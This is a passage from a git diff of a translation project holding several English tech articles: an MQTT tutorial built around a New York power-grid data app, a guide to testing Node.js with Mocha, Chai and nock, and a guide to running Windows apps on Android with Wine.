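    "Time Stamp": "05/09/2018 00:05:00",
    "Time Zone": "EDT",
    "Fuel Category": "Hydro",
    "Gen MW": "3229",
})
print(topic)    # ny-power/upstream/fuel-mix/Hydro
print(payload)
```

A real pump would then hand `topic` and `payload` to an MQTT client's publish call; only the row-to-message mapping is shown here.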
### MQTT topics

Topics and topic structures are one of MQTT's major design points. Unlike more "enterprisey" message buses, MQTT topics are not preregistered. A sender can create topics on the fly, the only limit being that they must be shorter than 220 characters. The `/` character is special; it's used to create topic hierarchies. As we'll soon see, you can subscribe to slices of data in these hierarchies.
Out of the box with Mosquitto, every client can publish to any topic. While it's great for prototyping, before going to production you'll want to add an access control list (ACL) to restrict writing to authorized applications. For example, my app's tree is accessible to everyone in read-only format, but only clients with specific credentials can publish to it.
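As an illustration, a minimal Mosquitto ACL file along those lines might look like the sketch below. The username `ny-power-pump` is an assumption for the example, not the credential any real deployment uses:

```
# Anonymous clients may only read the application tree
topic read ny-power/#

# Only the data pump's credentials may publish into it
user ny-power-pump
topic readwrite ny-power/#
```

This file is wired in with the `acl_file` option in `mosquitto.conf`.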
There is no automatic schema around topics, nor a way to discover all the possible topics that clients will publish to. You'll have to encode that understanding directly into any application that consumes the MQTT bus.

So how should you design your topics? The best practice is to start with an application-specific root name, in our case, `ny-power`. After that, build a hierarchy as deep as you need for efficient subscription. The `upstream` tree will contain data that comes directly from an upstream source without any processing. Our `fuel-mix` category is a specific type of data. We may add others later.

### Subscribing to topics
Subscriptions in MQTT are simple string matches. For processing efficiency, only two wildcards are allowed:
* `#` matches everything recursively to the end
* `+` matches only until the next `/` character
It's easiest to explain this with some examples:
```
ny-power/#                   - match everything published by the ny-power app
ny-power/upstream/#          - match all raw data
ny-power/upstream/fuel-mix/+ - match all fuel types
ny-power/+/+/Hydro           - match everything about Hydro power that's
                               nested 2 deep (even if it's not in the upstream tree)
```
A wide subscription like `ny-power/#` is common for low-volume applications. Just get everything over the network and handle it in your own application. This works poorly for high-volume applications, as most of the network bandwidth will be wasted as you drop most of the messages on the floor.
To stay performant at higher volumes, applications will use clever topic slices like `ny-power/+/+/Hydro` to get exactly the cross-section of data they need.
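The wildcard rules above are simple enough to sketch in a few lines. This is an illustrative reimplementation of the matching logic, not code from any broker; real brokers also handle edge cases (such as `$`-prefixed system topics) that this sketch ignores:

```python
def topic_matches(pattern, topic):
    """Check an MQTT subscription pattern against a concrete topic.

    '#' matches everything from its position to the end;
    '+' matches exactly one topic level.
    """
    plevels = pattern.split("/")
    tlevels = topic.split("/")
    for i, p in enumerate(plevels):
        if p == "#":
            return True          # matches the remainder of the topic
        if i >= len(tlevels):
            return False         # pattern is deeper than the topic
        if p != "+" and p != tlevels[i]:
            return False         # literal level mismatch
    # all levels matched literally or via '+'; lengths must agree
    return len(plevels) == len(tlevels)

print(topic_matches("ny-power/#", "ny-power/upstream/fuel-mix/Wind"))           # True
print(topic_matches("ny-power/+/+/Hydro", "ny-power/upstream/fuel-mix/Hydro"))  # True
print(topic_matches("ny-power/upstream/fuel-mix/+", "ny-power/computed/co2"))   # False
```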
### Adding our next layer of data
From this point forward, everything in the application will work off existing MQTT streams. The first additional layer of data is computing the power's CO2 intensity.
Using the 2016 [U.S. Energy Information Administration][7] numbers for total emissions and total power by fuel type in New York, we can come up with an [average emissions rate][8] per megawatt hour of power.
This is encapsulated in a dedicated microservice, which subscribes to `ny-power/upstream/fuel-mix/+` and therefore matches all upstream fuel-mix entries from the data pump. It performs the calculation and publishes to a new topic tree:

```
ny-power/computed/co2 {"units": "g / kWh", "value": 152.9486, "ts": "05/09/2018 00:05:00"}
```
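The calculation itself is a weighted average over the fuel mix. The sketch below illustrates the shape of it; the per-fuel emission rates are illustrative placeholders, not the actual EIA-derived numbers the ny-power service uses:

```python
# Illustrative g CO2 per kWh by fuel type -- placeholder values only,
# not the EIA-derived figures used by the real service.
CO2_G_PER_KWH = {
    "Natural Gas": 488.0,
    "Dual Fuel": 488.0,        # treated as natural gas, per the note above
    "Other Fossil Fuels": 963.0,
    "Nuclear": 0.0,
    "Hydro": 0.0,
    "Wind": 0.0,
    "Other Renewables": 0.0,
}

def co2_intensity(fuel_mix_mw):
    """Weighted-average grid intensity (g CO2 / kWh) for a fuel mix in MW."""
    total_mw = sum(fuel_mix_mw.values())
    grams = sum(CO2_G_PER_KWH.get(fuel, 0.0) * mw
                for fuel, mw in fuel_mix_mw.items())
    return grams / total_mw

mix = {"Natural Gas": 2144, "Dual Fuel": 1400, "Nuclear": 4114,
       "Hydro": 3229, "Wind": 1, "Other Renewables": 226,
       "Other Fossil Fuels": 4}
print(round(co2_intensity(mix), 1))  # roughly 156 with these placeholder rates
```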
In turn, there is another process that subscribes to this topic tree and archives that data into an [InfluxDB][9] instance. It then publishes a 24-hour time series to `ny-power/archive/co2/24h`, which makes it easy to graph the recent changes.
This layer model works well, as the logic for each of these programs can be distinct from each other. In a more complicated system, they may not even be in the same programming language. We don't care, because the interchange format is MQTT messages, with well-known topics and JSON payloads.
### Consuming from the command line
To get a feel for MQTT in action, it's useful to attach to the bus and watch the messages flow. The `mosquitto_sub` program, included in the `mosquitto-clients` package, is a simple way to do that.

After you've installed it, you need to provide a server hostname and the topic you'd like to listen to. The `-v` flag is important if you want to see the topics being posted to; without it, you'll see only the payloads.

```
mosquitto_sub -h mqtt.ny-power.org -t ny-power/# -v
```
Whenever I'm writing or debugging an MQTT application, I always have a terminal with `mosquitto_sub` running.
### Accessing MQTT directly from the web
We now have an application providing an open event stream. We can connect to it with our microservices and, with some command-line tooling, it's on the internet for all to see. But the web is still king, so it's important to get it directly into a user's browser.
The MQTT folks thought about this one. The protocol specification is designed to work over three transport protocols: [TCP][10], [UDP][11], and [WebSockets][12]. WebSockets are supported by all major browsers as a way to retain persistent connections for real-time applications.
The Eclipse project has a JavaScript implementation of MQTT called [Paho][13], which can be included in your application. The pattern is to connect to the host, set up some subscriptions, and then react to messages as they are received.
```
// ny-power web console application
var client = new Paho.MQTT.Client(mqttHost, Number("80"), "client-" + Math.random());

// set callback handlers
client.onMessageArrived = onMessageArrived;

// connect the client
client.reconnect = true;
client.connect({onSuccess: onConnect});

// called when the client connects
function onConnect() {
    // Once a connection has been made, make a subscription and send a message.
    console.log("onConnect");
    client.subscribe("ny-power/computed/co2");
    client.subscribe("ny-power/archive/co2/24h");
    client.subscribe("ny-power/upstream/fuel-mix/#");
}

// called when a message arrives
function onMessageArrived(message) {
    console.log("onMessageArrived:" + message.destinationName + message.payloadString);
    if (message.destinationName == "ny-power/computed/co2") {
        var data = JSON.parse(message.payloadString);
        $("#co2-per-kwh").html(Math.round(data.value));
        $("#co2-units").html(data.units);
        $("#co2-updated").html(data.ts);
    }
    if (message.destinationName.startsWith("ny-power/upstream/fuel-mix")) {
        fuel_mix_graph(message);
    }
    if (message.destinationName == "ny-power/archive/co2/24h") {
        var data = JSON.parse(message.payloadString);
        var plot = [
            {
                x: data.ts,
                y: data.values,
                type: 'scatter'
            }
        ];
        var layout = {
            yaxis: {
                title: "g CO2 / kWh",
            }
        };
        Plotly.newPlot('co2_graph', plot, layout);
    }
}
```
This application subscribes to a number of topics because we're going to display a few different kinds of data. The `ny-power/computed/co2` topic provides us a topline number of current intensity. Whenever we receive that topic, we replace the related contents on the site.
![NY ISO Grid CO2 Intensity][15]

NY ISO Grid CO2 Intensity graph from [ny-power.org][4].
The `ny-power/archive/co2/24h` topic provides a time series that can be loaded into a [Plotly][16] line graph. And `ny-power/upstream/fuel-mix` provides the data needed to provide a nice bar graph of the current fuel mix.
![Fuel mix on NYISO grid][18]

Fuel mix on NYISO grid, [ny-power.org][4].
This is a dynamic website that is not polling the server. It is attached to the MQTT bus and listening on its open WebSocket. The webpage is a pub/sub client just like the data pump and the archiver. This one just happens to be executing in your browser instead of a microservice in the cloud.
You can see the page in action at <http://ny-power.org>. That includes both the graphics and a real-time MQTT console to see the messages as they come in.

### Diving deeper
The entire ny-power.org application is [available as open source on GitHub][19]. You can also check out [this architecture overview][20] to see how it was built as a set of Kubernetes microservices deployed with [Helm][21]. You can see another interesting MQTT application example with [this code pattern][22] using MQTT and OpenWhisk to translate text messages in real time.
MQTT is used extensively in the Internet of Things space, and many more examples of MQTT use can be found at the [Home Assistant][23] project.

And if you want to dive deep into the protocol, [mqtt.org][3] has all the details for this open standard.

To learn more, attend Sean Dague's talk, [Adding MQTT to your toolkit][24], at [OSCON][25], which will be held July 16-19 in Portland, Oregon.
--------------------------------------------------------------------------------
via: https://opensource.com/article/18/6/mqtt

作者:[Sean Dague][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://opensource.com/users/sdague
[1]:http://www.nyiso.com/public/index.jsp
[2]:http://www.nyiso.com/public/markets_operations/market_data/reports_info/index.jsp
[3]:http://mqtt.org/
[4]:http://ny-power.org/#
[5]:https://www.home-assistant.io
[6]:https://mosquitto.org/
[7]:https://www.eia.gov/
[8]:https://github.com/IBM/ny-power/blob/master/src/nypower/calc.py#L1-L60
[9]:https://www.influxdata.com/
[10]:https://en.wikipedia.org/wiki/Transmission_Control_Protocol
[11]:https://en.wikipedia.org/wiki/User_Datagram_Protocol
[12]:https://en.wikipedia.org/wiki/WebSocket
[13]:https://www.eclipse.org/paho/
[15]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso-co2intensity.png (NY ISO Grid CO2 Intensity)
[16]:https://plot.ly/
[18]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso_fuel-mix.png (Fuel mix on NYISO grid)
[19]:https://github.com/IBM/ny-power
[20]:https://developer.ibm.com/code/patterns/use-mqtt-stream-real-time-data/
[21]:https://helm.sh/
[22]:https://developer.ibm.com/code/patterns/deploy-serverless-multilingual-conference-room/
[23]:https://www.home-assistant.io/
[24]:https://conferences.oreilly.com/oscon/oscon-or/public/schedule/speaker/77317
[25]:https://conferences.oreilly.com/oscon/oscon-or
@@ -1,3 +1,4 @@
+Translating by qhwdw
 How to reset, revert, and return to previous states in Git
 ======
@@ -1,3 +1,4 @@
+Translating by qhwdw
 Bitcoin is a Cult — Adam Caudill
 ======
 The Bitcoin community has changed greatly over the years; from technophiles that could explain a [Merkle tree][1] in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.
322 sources/tech/20180705 Testing Node.js in 2018.md Normal file
@@ -0,0 +1,322 @@
BriFuture is translating

Testing Node.js in 2018
============================================================

![](https://cdn-images-1.medium.com/max/1600/1*J3lGUOAGK-XdZMXwiHcI6w.png)
[Stream][4] powers feeds for over 300+ million end users. With all of those users relying on our infrastructure, we’re very good about testing everything that gets pushed into production. Our primary codebase is written in Go, with some remaining bits of Python.
Our recent showcase application, [Winds 2.0][5], is built with Node.js, and we quickly learned that our usual testing methods in Go and Python didn't quite fit. Furthermore, creating a proper test suite requires a bit of upfront work in Node.js, as the frameworks we are using don't offer any built-in test functionality.

Setting up a good test framework can be tricky regardless of what language you're using. In this post, we'll uncover the hard parts of testing with Node.js, cover the various tooling we decided to utilize in Winds 2.0, and point you in the right direction for when it comes time to write your next set of tests.

### Why Testing is so Important

We've all pushed a bad commit to production and faced the consequences. It's not a fun thing to have happen. Writing a solid test suite is not only a good sanity check, but it allows you to completely refactor code and feel confident that your codebase is still functional. This is especially important if you've just launched.

If you're working with a team, it's extremely important that you have test coverage. Without it, it's nearly impossible for other developers on the team to know whether their contributions will result in a breaking change (ouch).

Writing tests also encourages you and your teammates to split up code into smaller pieces. This makes it much easier to understand your code and fix bugs along the way. The productivity gains are even bigger because you catch bugs early on.

Finally, without tests, your codebase might as well be a house of cards. There is simply zero certainty that your code is stable.
### The Hard Parts
In my opinion, most of the testing problems we ran into with Winds were specific to Node.js. The ecosystem is always growing. For example, if you are on macOS and run "brew upgrade" (with Homebrew installed), your chances of seeing a new version of Node.js are quite high. With Node.js moving quickly and libraries following close behind, keeping up to date with the latest libraries is difficult.

Below are a few pain points that immediately come to mind:

1. Testing in Node.js is very opinionated and un-opinionated at the same time. Many people have different views on how a test infrastructure should be built and measured for success. The sad part is that there is no golden standard (yet) for how you should approach testing.

2. There are a large number of frameworks available to use in your application. However, they are generally minimal, with no well-defined configuration or boot process. This leads to side effects that are very common, and yet hard to diagnose; so, you'll likely end up writing your own test runner from scratch.

3. It's almost guaranteed that you will be _required_ to write your own test runner (we'll get to this in a minute).

The situations listed above are not ideal, and it's something that the Node.js community needs to address sooner rather than later. If other languages have figured it out, I think it's time for Node.js, a widely adopted language, to figure it out as well.

### Writing Your Own Test Runner

So… you're probably wondering what a test runner _is_. To be honest, it's not that complicated. A test runner is the highest-level component in the test suite. It allows you to specify global configurations and environments, as well as import fixtures. One would assume this would be simple and easy to do… Right? Not so fast…

What we learned is that, although there is a solid number of test frameworks out there, not a single one for Node.js provides a unified way to construct your test runner. Sadly, it's up to the developer to do so. Here's a quick breakdown of the requirements for a test runner:

* Ability to load different configurations (e.g. local, test, development) and ensure that you _NEVER_ load a production configuration — you can guess what goes wrong when that happens.

* Lift and seed a database with dummy data for testing. This must work for various databases, whether it be MySQL, PostgreSQL, MongoDB, or any other, for that matter.

* Ability to load fixtures (files with seed data for testing in a development environment).

With Winds, we chose to use Mocha as our test runner. Mocha provides an easy and programmatic way to run tests on an ES6 codebase via command-line tools (integrated with Babel).

To kick off the tests, we register the Babel module loader ourselves. This gives us finer-grained control over which modules are imported before Babel overrides the Node.js module-loading process, giving us the opportunity to mock modules before any tests are run.

Additionally, we use Mocha's test-runner feature to pre-assign HTTP handlers to specific requests. We do this because the normal initialization code is not run during tests (server interactions are mocked by the Chai HTTP plugin), and we run some safety checks to ensure we are not connecting to production databases.

While this isn't part of the test runner, having a fixture loader is an important part of our test suite. We examined existing solutions; however, we settled on writing our own helper so that it was tailored to our requirements. With our solution, we can load fixtures with complex data dependencies by following a simple ad-hoc convention when generating or writing fixtures by hand.
### Tooling for Winds
Although the process was cumbersome, we were able to find the right balance of tools and frameworks to make proper testing become a reality for our backend API. Here's what we chose to go with:

### Mocha ☕

[Mocha][6], described as a "feature-rich JavaScript test framework running on Node.js", was our immediate choice of tooling for the job. With well over 15k stars, many backers, sponsors, and contributors, we knew it was the right framework for the job.

### Chai 🥃

Next up was our assertion library. We chose to go with the traditional approach, which is what works best with Mocha — [Chai][7]. Chai is a BDD and TDD assertion library for Node.js. With a simple API, Chai was easy to integrate into our application and allowed us to easily assert what we should _expect_ to be returned from the Winds API. Best of all, writing tests feels natural with Chai. Here's a short example:
```
describe('retrieve user', () => {
    let user;

    before(async () => {
        await loadFixture('user');
        user = await User.findOne({email: authUser.email});
        expect(user).to.not.be.null;
    });

    after(async () => {
        await User.remove().exec();
    });

    describe('valid request', () => {
        it('should return 200 and the user resource, including the email field, when retrieving the authenticated user', async () => {
            const response = await withLogin(request(api).get(`/users/${user._id}`), authUser);

            expect(response).to.have.status(200);
            expect(response.body._id).to.equal(user._id.toString());
        });

        it('should return 200 and the user resource, excluding the email field, when retrieving another user', async () => {
            const anotherUser = await User.findOne({email: 'another_user@email.com'});

            const response = await withLogin(request(api).get(`/users/${anotherUser.id}`), authUser);

            expect(response).to.have.status(200);
            expect(response.body._id).to.equal(anotherUser._id.toString());
            expect(response.body).to.not.have.an('email');
        });
    });

    describe('invalid requests', () => {
        it('should return 404 if requested user does not exist', async () => {
            const nonExistingId = '5b10e1c601e9b8702ccfb974';
            expect(await User.findOne({_id: nonExistingId})).to.be.null;

            const response = await withLogin(request(api).get(`/users/${nonExistingId}`), authUser);
            expect(response).to.have.status(404);
        });
    });
});
```
### Sinon 🧙
With the ability to work with any unit testing framework, [Sinon][8] was our first choice for a mocking library. With a super clean integration and minimal setup, Sinon turns mocking requests into a simple and easy process. Their website has an extremely friendly user experience and offers easy steps to integrate Sinon with your test suite.

### Nock 🔮

For all external HTTP requests, we use [nock][9], a robust HTTP mocking library that really comes in handy when you have to communicate with a third-party API (such as [Stream's REST API][10]). There's not much to say about this little library aside from the fact that it is awesome at what it does, and that's why we like it. Here's a quick example of us calling our [personalization][11] engine for Stream:
```
nock(config.stream.baseUrl)
    .get(/winds_article_recommendations/)
    .reply(200, { results: [{foreign_id: `article:${article.id}`}] });
```
### Mock-require 🎩
The [mock-require][12] library allows you to mock dependencies on external code. With a single line of code, you can replace a module, and mock-require will step in when any code attempts to import that module. It's a small and minimalistic, but robust, library, and we're big fans.

### Istanbul 🔭

[Istanbul][13] is a JavaScript code coverage tool that computes statement, line, function, and branch coverage with module loader hooks to transparently add coverage when running tests. Although we have similar functionality with CodeCov (see next section), this is a nice tool to have when running tests locally.

### The End Result — Working Tests

With all of the libraries, including the test runner mentioned above, let's have a look at what a full test looks like (you can see our entire test suite [here][14]):
```
import nock from 'nock';
import { expect, request } from 'chai';

import api from '../../src/server';
import Article from '../../src/models/article';
import config from '../../src/config';
import { dropDBs, loadFixture, withLogin } from '../utils.js';

describe('Article controller', () => {
    let article;

    before(async () => {
        await dropDBs();
        await loadFixture('initial-data', 'articles');
        article = await Article.findOne({});
        expect(article).to.not.be.null;
        expect(article.rss).to.not.be.null;
    });

    describe('get', () => {
        it('should return the right article via /articles/:articleId', async () => {
            let response = await withLogin(request(api).get(`/articles/${article.id}`));
            expect(response).to.have.status(200);
        });
    });

    describe('get parsed article', () => {
        it('should return the parsed version of the article', async () => {
            const response = await withLogin(
                request(api).get(`/articles/${article.id}`).query({ type: 'parsed' })
            );
            expect(response).to.have.status(200);
        });
    });

    describe('list', () => {
        it('should return the list of articles', async () => {
            let response = await withLogin(request(api).get('/articles'));
            expect(response).to.have.status(200);
        });
    });

    describe('list from personalization', () => {
        after(function () {
            nock.cleanAll();
        });

        it('should return the list of articles', async () => {
            nock(config.stream.baseUrl)
                .get(/winds_article_recommendations/)
                .reply(200, { results: [{foreign_id: `article:${article.id}`}] });

            const response = await withLogin(
                request(api).get('/articles').query({
                    type: 'recommended',
                })
            );
            expect(response).to.have.status(200);
            expect(response.body.length).to.be.at.least(1);
            expect(response.body[0].url).to.eq(article.url);
        });
    });
});
```
### Continuous Integration
There are a lot of continuous integration services available, but we like to use [Travis CI][15] because they love the open-source environment just as much as we do. Given that Winds is open-source, it made for a perfect fit.

Our integration is rather simple — we have a [.travis.yml][16] file that sets up the environment and kicks off our tests via a simple [npm][17] command. Coverage reports back to GitHub, where we have a clear picture of whether or not our latest codebase or PR passes our tests. The GitHub integration is great, as it is visible without us having to go to Travis CI to look at the results. Below is a screenshot of GitHub when viewing the PR (after tests):

![](https://cdn-images-1.medium.com/max/1600/1*DWfI0No5wZn7BBoWtJsLoA.png)

In addition to Travis CI, we use a tool called [CodeCov][18]. CodeCov is similar to [Istanbul][19]; however, it's a visualization tool that allows us to easily see code coverage, files changed, lines modified, and all sorts of other goodies. Though visualizing this data is possible without CodeCov, it's nice to have everything in one spot.

### What We Learned

![](https://cdn-images-1.medium.com/max/1600/1*c9uadS4Rk4oQHxf9Gl6Q3g.png)

We learned a lot throughout the process of developing our test suite. With no "correct" way of doing things, we decided to set out and create our own test flow by sorting through the available libraries to find ones that were promising enough to add to our toolbox.

What we ultimately learned is that testing in Node.js is not as easy as it may sound. Hopefully, as Node.js continues to grow, the community will come together and build a rock-solid library that handles everything test-related in a "correct" manner.

Until then, we'll continue to use our test suite, which is open-source on the [Winds GitHub repository][20].
### Limitations
#### No Easy Way to Create Fixtures

Frameworks and languages, such as Python's Django, have easy ways to create fixtures. With Django, for example, you can use the following commands to automate the creation of fixtures by dumping data into a file:
The Following command will dump the whole database into a db.json file:
|
||||||
|
./manage.py dumpdata > db.json
|
||||||
|
|
||||||
|
The Following command will dump only the content in django admin.logentry table:
|
||||||
|
./manage.py dumpdata admin.logentry > logentry.json
|
||||||
|
|
||||||
|
The Following command will dump the content in django auth.user table: ./manage.py dumpdata auth.user > user.json
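Fixtures dumped this way can be loaded back into the database with Django's `loaddata` management command, for example:

./manage.py loaddata db.json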
There’s no easy way to create a fixture in Node.js. What we ended up doing was using MongoDB Compass and exporting JSON from there. This resulted in a nice fixture, as shown below (however, it was a tedious process and prone to error):
![](https://cdn-images-1.medium.com/max/1600/1*HvXXS57rAIfBTOQ9h1HCew.png)
#### Unintuitive Module Loading When Using Babel, Mocked Modules, and the Mocha Test Runner

To support a broader variety of Node versions and have access to the latest additions to the JavaScript standard, we are using Babel to transpile our ES6 codebase to ES5. The Node.js module system is based on the CommonJS standard, whereas the ES6 module system has different semantics.

Babel emulates ES6 module semantics on top of the Node.js module system, but because we are interfering with module loading by using mock-require, we are embarking on a journey through weird module loading corner cases, which seem unintuitive and can lead to multiple independent versions of a module being imported, initialized, and used throughout the codebase. This complicates mocking and global state management during testing.
#### Inability to Mock Functions Used Within the Module They Are Declared in When Using ES6 Modules

When a module exports multiple functions where one calls the other, it’s impossible to mock the function being used inside the module. The reason is that when you require an ES6 module you are presented with a separate set of references from the one used inside the module. Any attempt to rebind the references to point to new values does not really affect the code inside the module, which will continue to use the original function.
### Final Thoughts

Testing Node.js applications is a complicated process because the ecosystem is always evolving. It’s important to stay on top of the latest and greatest tools so you don’t fall behind.

There are so many outlets for JavaScript-related news these days that it’s hard to keep up to date with all of them. Following email newsletters such as [JavaScript Weekly][21] and [Node Weekly][22] is a good start. Beyond that, joining a subreddit such as [/r/node][23] is a great idea. If you like to stay on top of the latest trends, [State of JS][24] does a great job of helping developers visualize trends in the testing world.

Lastly, here are a couple of my favorite blogs where articles often pop up:

* [Hacker Noon][1]

* [Free Code Camp][2]

* [Bits and Pieces][3]

Think I missed something important? Let me know in the comments, or on Twitter – [@NickParsons][25].

Also, if you’d like to check out Stream, we have a great 5-minute tutorial on our website. Give it a shot [here][26].

--------------------------------------------------------------------------------
作者简介:

Nick Parsons

Dreamer. Doer. Engineer. Developer Evangelist https://getstream.io.

--------------------------------------------------------------------------------

via: https://hackernoon.com/testing-node-js-in-2018-10a04dd77391

作者:[Nick Parsons][a]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://hackernoon.com/@nparsons08?source=post_header_lockup
[1]:https://hackernoon.com/
[2]:https://medium.freecodecamp.org/
[3]:https://blog.bitsrc.io/
[4]:https://getstream.io/
[5]:https://getstream.io/winds
[6]:https://github.com/mochajs/mocha
[7]:http://www.chaijs.com/
[8]:http://sinonjs.org/
[9]:https://github.com/node-nock/nock
[10]:https://getstream.io/docs_rest/
[11]:https://getstream.io/personalization
[12]:https://github.com/boblauer/mock-require
[13]:https://github.com/gotwarlost/istanbul
[14]:https://github.com/GetStream/Winds/tree/master/api/test
[15]:https://travis-ci.org/
[16]:https://github.com/GetStream/Winds/blob/master/.travis.yml
[17]:https://www.npmjs.com/
[18]:https://codecov.io/#features
[19]:https://github.com/gotwarlost/istanbul
[20]:https://github.com/GetStream/Winds/tree/master/api/test
[21]:https://javascriptweekly.com/
[22]:https://nodeweekly.com/
[23]:https://www.reddit.com/r/node/
[24]:https://stateofjs.com/2017/testing/results/
[25]:https://twitter.com/@nickparsons
[26]:https://getstream.io/try-the-api
@ -1,126 +0,0 @@
How to Run Windows Apps on Android with Wine
======

![](https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-featured-image.jpg)

Wine (on Linux, not the one you drink) is a free and open-source compatibility layer for running Windows programs on Unix-like operating systems. Started in 1993, it can run a wide variety of Windows programs on Linux and macOS, although sometimes with modifications. Now the Wine project has rolled out version 3.0, which is compatible with your Android devices.

In this article we will show you how you can run Windows apps on your Android device with Wine.

**Related** : [How to Easily Install Windows Games on Linux with Winepak][1]

### What can you run on Wine?

Wine is only a compatibility layer, not a full-blown emulator, so you need an x86 Android device to take full advantage of it. However, most Androids in the hands of consumers are ARM-based.

Since most of you are using an ARM-based Android device, you will only be able to use Wine to run apps that have been adapted to run on Windows RT. There is a limited, but growing, list of software available for ARM devices. You can find a list of these compatible apps in this [thread][2] on the XDA Developers Forums.

Some examples of apps you will be able to run on ARM are:
* [Keepass Portable][3]: A password storage wallet

* [Paint.NET][4]: An image manipulation program

* [SumatraPDF][5]: A document reader for PDFs and possibly some other document types

* [Audacity][6]: A digital audio recording and editing program

There are also some open-source retro games available like [Doom][7] and [Quake 2][8], as well as the open-source clone, [OpenTTD][9], a version of Transport Tycoon.

The list of programs that Wine can run on Android ARM devices is bound to grow as the popularity of Wine on Android expands. The Wine project is working on using QEMU to emulate x86 CPU instructions on ARM, and when that is complete, the number of apps your Android will be able to run should grow rapidly.

### Installing Wine
To install Wine you must first make sure that your device’s settings allow it to download and install APKs from sources other than the Play Store. To do this you’ll need to give your device permission to download apps from unknown sources.

1. Open Settings on your phone and select your Security options.

![wine-android-security][10]

2. Scroll down and click on the switch next to “Unknown Sources.”

![wine-android-unknown-sources][11]

3. Accept the risks in the warning.

![wine-android-unknown-sources-warning][12]

4. Open the [Wine installation site][13], and tap the first checkbox in the list. The download will automatically begin.

![wine-android-download-button][14]

5. Once the download completes, open it from your Downloads folder, or pull down the notifications menu and click on the completed download there.

6. Install the program. It will notify you that it needs access to record audio and to modify, delete, and read the contents of your SD card. You may also need to grant audio recording access for some apps you will use in the program.

![wine-android-app-access][15]

7. When the installation completes, click on the icon to open the program.

![wine-android-icon-small][16]

When you open Wine, the desktop mimics Windows 7.

![wine-android-desktop][17]

One drawback of Wine is that you have to have an external keyboard available to type. An external mouse may also be useful if you are running it on a small screen and find it difficult to tap small buttons.

You can tap the Start button to open two menus – Control Panel and Run.

![wine-android-start-button][18]

### Working with Wine

When you tap “Control panel” you will see three choices – Add/Remove Programs, Game Controllers, and Internet Settings.

Using “Run,” you can open a dialog box to issue commands. For instance, launch Internet Explorer by entering `iexplore`.

![wine-android-run][19]

### Installing programs on Wine
1. Download the application (or sync via the cloud) to your Android device. Take note of where you save it.

2. Open the Wine Command Prompt window.

3. Type the path to the location of the program. If you have saved it to the Download folder on your SD card, type:

4. To run the file in Wine for Android, simply input the name of the EXE file.
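Putting steps 3 and 4 together, a session in the Wine command prompt might look something like the following. Note that the `D:` drive mapping and the EXE name are illustrative assumptions — check how your Wine build maps the SD card, and substitute your program's actual file name:

cd D:\Download
keepass.exe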
If the ARM-ready file is compatible, it should run. If not, you’ll see a bunch of error messages. At this stage, installing Windows software on Android in Wine can be hit or miss.

There are still a lot of issues with this new version of Wine for Android. It doesn’t work on all Android devices. It worked on my Galaxy S6 Edge but not on my Galaxy Tab 4. Many games won’t work because the graphics driver doesn’t support Direct3D yet. You need an external keyboard and mouse to be able to easily manipulate the screen because touch-screen support is not fully developed yet.

Even with these issues in the early stages of release, the possibilities for this technology are thought-provoking. It will certainly take some time yet before you can launch Windows programs on your Android smartphone using Wine without a hitch.

--------------------------------------------------------------------------------

via: https://www.maketecheasier.com/run-windows-apps-android-with-wine/

作者:[Tracey Rosenberger][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.maketecheasier.com/author/traceyrosenberger/
[1]:https://www.maketecheasier.com/winepak-install-windows-games-linux/ (How to Easily Install Windows Games on Linux with Winepak)
[2]:https://forum.xda-developers.com/showthread.php?t=2092348
[3]:http://downloads.sourceforge.net/keepass/KeePass-2.20.1.zip
[4]:http://forum.xda-developers.com/showthread.php?t=2411497
[5]:http://forum.xda-developers.com/showthread.php?t=2098594
[6]:http://forum.xda-developers.com/showthread.php?t=2103779
[7]:http://forum.xda-developers.com/showthread.php?t=2175449
[8]:http://forum.xda-developers.com/attachment.php?attachmentid=1640830&d=1358070370
[9]:http://forum.xda-developers.com/showpost.php?p=36674868&postcount=151
[10]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-security.png (wine-android-security)
[11]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources.jpg (wine-android-unknown-sources)
[12]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources-warning.png (wine-android-unknown-sources-warning)
[13]:https://dl.winehq.org/wine-builds/android/
[14]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-download-button.png (wine-android-download-button)
[15]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-app-access.jpg (wine-android-app-access)
[16]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-icon-small.jpg (wine-android-icon-small)
[17]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-desktop.png (wine-android-desktop)
[18]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-start-button.png (wine-android-start-button)
[19]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-Run.png (wine-android-run)
@ -1,3 +1,4 @@
Translating by qhwdw

A sysadmin's guide to network management
======
@ -1,70 +0,0 @@
translating---geekpi

Boost your typing with emoji in Fedora 28 Workstation
======

![](https://fedoramagazine.org/wp-content/uploads/2018/07/emoji-typing-816x345.jpg)

